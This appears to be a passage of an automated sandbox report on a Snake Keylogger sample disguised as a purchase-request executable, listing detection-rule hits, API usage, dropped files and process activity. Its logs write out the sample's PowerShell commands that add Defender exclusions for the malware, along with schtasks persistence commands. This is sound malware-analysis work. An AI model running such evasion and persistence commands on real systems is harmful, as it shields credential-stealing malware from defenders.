                      Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 9.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: nDEusQ.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, -i-.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, -i-.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, fkQPIScgjIfgwhQwC4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, fkQPIScgjIfgwhQwC4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, fkQPIScgjIfgwhQwC4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, fkQPIScgjIfgwhQwC4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.7200000.4.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, fkQPIScgjIfgwhQwC4.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, fkQPIScgjIfgwhQwC4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.45955f0.2.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.461d810.1.raw.unpack, OXmYbftiauxP9AL5jO.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@4/4
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile created: C:\Users\user\AppData\Roaming\nDEusQ.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:336:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeMutant created: \Sessions\1\BaseNamedObjects\BdQfQQEkA
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF9F0.tmpJump to behavior
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002C08000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003263000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003273000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000032B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeVirustotal: Detection: 33%
                      Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeFile read: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\nDEusQ.exe C:\Users\user\AppData\Roaming\nDEusQ.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess created: C:\Users\user\AppData\Roaming\nDEusQ.exe "C:\Users\user\AppData\Roaming\nDEusQ.exe"
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nDEusQ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmpF9F0.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeProcess created: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe "C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nDEusQ" /XML "C:\Users\user\AppData\Local\Temp\tmp710.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nDEusQ.exeProcess created: C:\Users\user\AppData\Roaming\nDEusQ.exe "C:\Users\user\AppData\Roaming\nDEusQ.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
